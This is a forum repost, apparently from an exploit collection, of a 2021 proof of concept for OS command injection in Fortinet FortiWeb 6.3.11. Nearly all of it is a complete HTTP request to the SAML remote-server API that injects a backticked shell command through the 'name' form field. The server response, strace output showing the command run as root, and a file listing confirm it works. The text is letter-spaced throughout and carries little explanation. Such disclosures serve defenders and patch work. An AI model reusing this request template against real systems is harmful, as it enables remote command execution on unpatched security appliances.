搜索

[20676] 2021-08-20_0dayFortinetFortiWebOS命令注入

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-08-20_0dayFortinetFortiWebOS命令注入 0 d a y   F o r t i n e t   F o r t i W e b   O S   T o d   B e a r d s l e y   K h a n   2 0 2 1 - 0 8 - 2 0                 F o r t i W e b     6 . 3 . 1 1     S A M L   P O C P O S T   / a p i / v 2 . 0 / u s e r / r e m o t e s e r v e r . s a m l   H T T P / 1 . 1 H o s t :   [ r e d a c t e d ] C o o k i e :   [ r e d a c t e d ] U s e r - A g e n t :   [ r e d a c t e d ] A c c e p t :   a p p l i c a t i o n / j s o n ,   t e x t / p l a i n ,   * / * A c c e p t - L a n g u a g e :   e n - U S , e n ; q = 0 . 5 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e R e f e r e r :   h t t p s : / / [ r e d a c t e d ] / r o o t / u s e r / r e m o t e - u s e r / s a m l - u s e r / X - C s r f t o k e n :   8 1 4 9 4 0 1 6 0 C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - L e n g t h :   3 0 6 8 O r i g i n :   h t t p s : / / [ r e d a c t e d ] D n t :   1 T e :   t r a i l e r s C o n n e c t i o n :   c l o s e - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " q _ t y p e " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " n a m e " ` t o u c h   / t m p / v u l n e r a b l e ` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " e n t i t y I D " t e s t - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s e r v i c e - p a t h " / s a m l . s s o - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s e s s i o n - l i f e t i m e " 8 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s e s s i o n - t i m e o u t " 3 0
t o u c h   m k d i r   s h e l l   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s s o - b i n d " p o s t - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s s o - b i n d _ v a l " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s s o - p a t h " / S A M L 2 / P O S T - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s l o - b i n d " p o s t - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s l o - b i n d _ v a l " 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " s l o - p a t h " / S L O / P O S T - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " f l a g " 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " e n f o r c e - s i g n i n g " d i s a b l e - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " e n f o r c e - s i g n i n g _ v a l " 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " m e t a f i l e " ;   f i l e n a m e = " t e s t . x m l " C o n t e n t - T y p e :   t e x t / x m l < ? x m l   v e r s i o n = " 1 . 0 " ? > < m d : E n t i t y D e s c r i p t o r   x m l n s : m d = " u r n : o a s i s : n a m e s : t c : S A M L : 2 . 0 : m e t a d a t a "   v a l i d U n t i l = " 2 0 2 1 - 0 6 - 1 2 T 1 6 : 5 4 : 3 1 Z "   c a c h e D u r a t i o n = " P T 1 6 2 3 9 4 8 8 7 1 S "   e n t i t y I D = " t e s t " > < m d : I D P S S O D e s c r i p t o r   W a n t A u t h n R e q u e s t s S i g n e d = " f a l s e "   p r o t o c o l S u p p o r t E n u m e r a t i o n = " u r n : o a s i s : n a m e s : t c : S A M L : 2 . 0 : p r o t o c o l " > < m d : K e y D e s c r i p t o r   u s e = " s i g n i n g " > < d s : K e y I n f o   x m l n s : d s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / 0 9 / x m l d s i g # " > < d s : X 5 0 9 D a t a > < d s : X 5 0 9 C e r t i f i c a t e > t e s t < / d s : X 5 0 9 C e r t i f i c a t e > < / d s : X 5 0 9 D a t a > < / d s : K e y I n f o > < / m d : K e y D e s c r i p t o r > < m d : K e y D e s c r i p t o r   u s e = " e n c r y p t i o n " > < d s : K e y I n f o   x m l n s : d s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / 0 9 / x m l d s i g # " > < d s : X 5 0 9 D a t a > < d s : X 5 0 9 C e r t i f i c a t e > t e s t < / d s : X 5 0 9 C e r t i f i c a t e > < / d s : X 5 0 9 D a t a > < / d s : K e y I n f o > < / m d : K e y D e s c r i p t o r > < m d : N a m e I D F o r m a t > u r n : o a s i s : n a m e s : t c : S A M L : 1 . 1 : n a m e i d - f o r m a t : u n s p e c i f i e d < / m d : N a m e I D F o r m a t > < m d : S i n g l e S i g n O n S e r v i c e   B i n d i n g = " u r n : o a s i s : n a m e s : t c : S A M L : 2 . 0 : b i n d i n g s : H T T P - R e d i r e c t "   L o c a t i o n = " t e s t " / > < / m d : I D P S S O D e s c r i p t o r > < / m d : E n t i t y D e s c r i p t o r > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 4 3 5 1 1 3 1 1 1 1 8 9 9 5 7 1 3 8 1 6 3 1 6 9 4 4 1 2 - - H T T P / 1 . 1   5 0 0   I n t e r n a l   S e r v e r   E r r o r D a t e :   T h u ,   1 0   J u n   2 0 2 1   1 1 : 5 9 : 4 5   G M T C a c h e - C o n t r o l :   n o - c a c h e ,   n o - s t o r e ,   m u s t - r e v a l i d a t e P r a g m a :   n o - c a c h e S e t - C o o k i e :   [ r e d a c t e d ] X - F r a m e - O p t i o n s :   S A M E O R I G I N X - X S S - P r o t e c t i o n :   1 ;   m o d e = b l o c k C o n t e n t - S e c u r i t y - P o l i c y :   f r a m e - a n c e s t o r s   ' s e l f ' X - C o n t e n t - T y p e - O p t i o n s :   n o s n i f f C o n t e n t - L e n g t h :   2 0 S t r i c t - T r a n s p o r t - S e c u r i t y :   m a x - a g e = 6 3 0 7 2 0 0 0 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n { " e r r c o d e " :   " - 6 5 1 " } [ p i d   1 2 8 6 7 ]   e x e c v e ( " / m i g a d m i n / c g i - b i n / f w b c g i " ,   [ " / m i g a d m i n / c g i - b i n / f w b c g i " ] ,   0 x 5 5 b b 0 3 9 5 b f 0 0   / *   4 2   v a r s   * / )   =   0 [ p i d   1 3 9 3 4 ]   e x e c v e ( " / b i n / s h " ,   [ " s h " ,   " - c " ,   " m k d i r   / d a t a / e t c / s a m l / s h i b b o l e t h / s e r v i c e _ p r o v i d e r s / ` t o u c h   / t m p / v u l n e r a b l e ` " ] ,   0 x 7 f f f 5 6 b 1 c 6 0 8   / *   4 2   v a r s   * / )   =   0
  F o r t i W e b   t o u c h [ p i d   1 3 9 3 5 ]   e x e c v e ( " / b i n / t o u c h " ,   [ " t o u c h " ,   " / t m p / v u l n e r a b l e " ] ,   0 x 5 5 7 7 4 a a 3 0 b f 8   / *   4 4   v a r s   * / )   =   0 [ p i d   1 3 9 3 6 ]   e x e c v e ( " / b i n / m k d i r " ,   [ " m k d i r " ,   " / d a t a / e t c / s a m l / s h i b b o l e t h / s e r v i c e _ p r o v i d e r s / " ] ,   0 x 5 5 7 7 4 a a 3 0 b e 8   / *   4 4   v a r s   * / )   =   0 / #   l s   - l   / t m p / v u l n e r a b l e - r w - r - - r - -         1   r o o t           0                                 0   J u n   1 0   1 1 : 5 9   / t m p / v u l n e r a b l e / #
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理